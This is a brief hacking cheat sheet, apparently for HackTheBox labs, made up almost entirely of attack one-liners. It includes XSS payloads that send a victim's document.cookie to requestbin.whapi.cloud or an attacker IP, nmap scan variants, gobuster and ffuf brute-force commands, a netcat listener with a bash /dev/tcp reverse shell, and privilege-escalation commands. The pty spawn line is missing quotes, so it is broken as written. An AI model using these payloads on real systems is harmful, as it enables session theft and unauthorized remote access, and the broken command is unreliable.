Useful websites

  • Hackthebox
  • Arch wiki
  • Requestbin whapi
  • Analyze & bruteforce encryption

    • Other cheatsheets

  • Hacking resources

    • TL;DR

    xss

  • document.location="https://requestbin.whapi.cloud/something.php?c=" + document.cookie;

  • because hackthebox machines do not allow non-local internet connection, you have to use python -m http.server 1234

  • document.location="http://IP:1234/?c=" + document.cookie;

    • nmap

  • nmap -sS -sC -sV IP

    ---- TCP SYN port scan (Default)

  • nmap -sT -sC -sV IP

    ---- TCP connect port scan (Default without root privilege)

  • nmap -sU -sC -sV IP

    ---- UDP port scan

  • nmap -sA -sC -sV IP

    ---- TCP ACK port scan

    • Web enumeration

  • gobuster dir -u http://example.com -w /path/to/wordlist.txt

    ---- Directory brute-force using Gobuster

  • ffuf -u http://example.com -H "Host: FUZZ.example.com" -w /path/to/wordlist.txt

    ---- Subdomain brute-force using FFUF

    • Reverse shell

  • nc -lvnp 9999

    ---- listen to port 9999 with netcat

  • bash -i >& /dev/tcp/IP/9999 0>&1

    ---- start interactive bash shell that redirects its output to the ip/port

    • Après shell

  • sudo -l

    ---- list the allowed (and forbidden) commands for the invoking user

  • python -c 'import pty; pty.spawn(/bin/bash)'

    ---- escalate nc -> real shell

  • bash -p

    ---- spawns bash in priveleged mode